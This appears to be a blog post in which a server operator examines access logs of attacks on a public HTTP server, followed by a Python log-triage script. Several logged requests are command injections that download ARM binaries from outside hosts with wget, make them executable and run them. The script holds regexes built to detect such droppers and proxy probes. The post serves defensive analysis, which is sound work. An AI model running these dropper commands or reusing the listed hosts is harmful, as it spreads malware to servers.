[Network Security] On an HTTP server being hit by webshell attacks
- 1. Background
- 2. IP address lookup
- 3. Suspicious request IPs
1. Background
I deployed a web server on the Alibaba Cloud public network. Recently customers reported that my service keeps going down; checking the backend logs, I found attacks coming from overseas IPs.
For example:
209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
As shown in the figure below:
2. IP address lookup
I use the IP address database lookup from Jack Ma's company (Taobao):
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g
For example, looking up the suspicious IP from the log below:
209.141.56.212
3. Suspicious request IPs
209.141.56.212
209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
141.101.196.233
This attacker is a bit interesting (friendly?): once it found out my server is in China, it stopped attacking. Details:
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:17] "CONNECT 91.214.48.87:80 HTTP/1.1" 404 -
[ ERROR ] 141.101.196.233 - - [17/Sep/2021 12:58:27] code 400, message Bad request syntax ('\x04\x01\x00P[Ö0W0\x00')
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:27] "P[Ö0W0" HTTPStatus.BAD_REQUEST -
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:29] "POST http://proxy.kagda.ru/myip2.php?Z74857023071Q1 HTTP/1.1" 404 -
47.100.27.27
89.248.165.93 - - [13/Sep/2021 16:29:22] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.93 - - [13/Sep/2021 16:29:22] "[35m[1m à [0m" HTTPStatus.BAD_REQUEST -
205.185.115.123
205.185.115.123 - - [13/Sep/2021 19:30:50] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
89.248.165.13
89.248.165.13 - - [13/Sep/2021 23:46:45] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.13 - - [13/Sep/2021 23:46:45] "[35m[1m à [0m" HTTPStatus.BAD_REQUEST -
205.185.115.123
205.185.115.123 - - [14/Sep/2021 04:52:39] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
205.185.115.123 - - [14/Sep/2021 10:27:01] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
74.120.14.44
74.120.14.44 - - [14/Sep/2021 10:39:06] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{ \x01\x00\x00w\x03\x030âFh®\xad\x18\xad\x8c=\x8d\x07Ï4úiQß\x90æ\x92\x80±àTêP*6ß\x10\x08\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')
74.120.14.44 - - [14/Sep/2021 10:39:06] "[35m[1m { w0âFh®Œ=Ï4úiQßæ’€±àTêP*6ß À/À+ÀÀÀÀ ÀÀ[0m" HTTPStatus.BAD_REQUEST -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -
185.219.52.154
185.219.52.154 - - [14/Sep/2021 22:34:50] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00É·\x00\x00')
185.219.52.154 - - [14/Sep/2021 22:34:50] "[35m[1m 4 ( ÿ U MSSQLServer É· [0m" HTTPStatus.BAD_REQUEST -
78.128.112.18
78.128.112.18 - - [15/Sep/2021 00:58:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
78.128.112.18 - - [15/Sep/2021 00:58:36] "[35m[1m /*à Cookie: mstshash=Administr[0m" HTTPStatus.BAD_REQUEST -
47.103.21.238
47.103.21.238 - - [15/Sep/2021 08:48:35] code 400, message Bad request version ("_¸<³'àA\x04\x9b\x84%.W7\x00\x00\x16À\x14\x005À\x13\x00/À,À+À0\x00\x9dÀ/\x00\x9c\x00")
47.103.21.238 - - [15/Sep/2021 08:48:35] "[35m[1m ˆ „aAB㲂 øN5[‡ç47þ_¸<³'àA›„%.W7 À 5À /À,À+À0 À/ œ [0m" HTTPStatus.BAD_REQUEST -
161.189.134.11
161.189.134.11 - - [15/Sep/2021 14:27:33] code 400, message Bad request syntax ('{ \x01\x00\x1615888888888À¨\x90Á\x13\x8a{')
161.189.134.11 - - [15/Sep/2021 14:27:33] "[35m[1m{ 15888888888À¨ÁŠ{[0m" HTTPStatus.BAD_REQUEST -
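As an added example (not code from the original post), the script below triages the Python http.server log format shown above: it parses each line, flags the /shell? command-injection requests and extracts the dropper host, and decodes the "Bad request" payloads to recognise the TLS, SOCKS4, RDP and MSSQL probes listed in this section. The protocol labels are leading-byte heuristics I chose, and the sample lines are copied from the log quoted in the post.

```python
import re

# Python http.server log line as in the post: optional "[ INFO ] " prefix, colour codes whose
# ESC byte may be lost ("[33m"..."[0m"), then either a request line or a "code 400" message.
LINE_RE = re.compile(
    r'^(?:\[ \w+ \] )?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - - \[(?P<ts>[^\]]+)\] '
    r'(?:"(?:\x1b?\[\d+m)*(?P<req>.*?)(?:\x1b?\[\d+m)*" (?P<status>\S+) -'
    r'|code (?P<code>\d+), message (?P<msg>.*))$'
)
# Dropper host inside a "/shell?cd+/tmp;...;wget+http://HOST/arm7;..." command chain.
DROPPER_RE = re.compile(r'(?:wget|curl)\+https?:/\\?/(?P<host>[\w.\-]+)')

def raw_payload(msg):
    """Turn the repr() text inside "Bad request ... ('...')" back into the bytes the client sent."""
    text = msg.partition("(")[2].strip("()'\"")
    try:  # the repr holds only latin-1 characters plus \xNN escapes
        return text.encode("latin-1").decode("unicode_escape").encode("latin-1")
    except UnicodeError:
        return b""

def fingerprint(payload):
    # Leading bytes of the non-HTTP protocols the server rejected in the post's log (heuristic).
    if payload.startswith(b"\x16\x03\x01"):
        return "tls-clienthello", None
    if payload.startswith(b"\x04\x01") and len(payload) >= 8:  # SOCKS4 CONNECT: port, IPv4
        port = int.from_bytes(payload[2:4], "big")
        return "socks4-connect", "%s:%d" % (".".join(map(str, payload[4:8])), port)
    if payload.startswith(b"\x03\x00\x00") or b"mstshash=" in payload:
        return "rdp-x224", None
    if b"MSSQLServer" in payload:
        return "mssql-probe", None
    return "unknown", None

def triage(lines):
    # Returns (ip, kind, detail) for every line that looks like a scan or attack.
    findings = []
    for m in filter(None, map(LINE_RE.match, lines)):
        if m["msg"] is not None:
            findings.append((m["ip"],) + fingerprint(raw_payload(m["msg"])))
        elif "/shell?" in m["req"]:
            hosts = sorted(set(DROPPER_RE.findall(m["req"])))
            findings.append((m["ip"], "shell-dropper", ",".join(hosts)))
        elif m["req"].startswith(("CONNECT ", "POST http://")):
            findings.append((m["ip"], "open-proxy-probe", m["req"].split()[1]))
    return findings

SAMPLE = [  # constructed from the log lines quoted in the post
    r'209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3 HTTP/1.1[0m" 404 -',
    r"[ ERROR ] 141.101.196.233 - - [17/Sep/2021 12:58:27] code 400, message Bad request syntax ('\x04\x01\x00P[Ö0W0\x00')",
    r"78.128.112.18 - - [15/Sep/2021 00:58:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')",
]
```

Decoding the SOCKS4 payload recovers the destination 91.214.48.87:80, the same host the attacker asked for in the HTTP CONNECT line just before it, so that IP was checking whether the server works as an open proxy rather than attacking it.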